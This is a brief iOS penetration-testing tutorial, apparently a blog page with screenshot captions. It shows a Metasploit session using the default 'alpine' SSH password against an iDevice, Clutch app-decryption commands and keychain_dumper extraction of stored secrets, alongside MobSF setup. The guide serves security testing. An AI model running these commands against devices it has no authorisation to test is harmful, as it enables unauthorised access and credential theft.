iOS Mobile Penetration Testing

Connecting to an iDevice Using SSH or WinSCP

Connect to iDevice using SSH or WinSCP

The default password is alpine.

Verifying the OpenSSH Default Password

Checking default password for OpenSSH

1
2
3
4
5

msfconsole
msf > use exploit/apple_ios/ssh/cydia_default_ssh
msf > show options
msf > set RHOST 10.9.8.84
msf > exploit

SSH session

Extracting IPA Files from Installed Applications

1
2

./Clutch-2.0.4 -i
./Clutch-2.0.4 -d

Determining Application Locations

IPA Installer

1

ipainstaller -i

IPA Installer output

Application folder

1

otool -l -v  | grep stack

Class dump output

Insecure Data Storage

Keychain Dumper Usage

Execute the command ./keychain_dumper > output.txt to extract keychain data and store it in a file named “output.txt.”

MobSF Setup and Usage

To run the Mobile Security Framework (MobSF), use the following command:

1

python manage.py server

MobSF user interface

MobSF Windows support

MobSF analysis screen 1

MobSF analysis screen 2

MobSF analysis screen 3

MobSF analysis screen 4

MobSF analysis screen 5

Licensed under CC BY-NC-SA 4.0
Last updated on Sep 25, 2023 16:40 +0100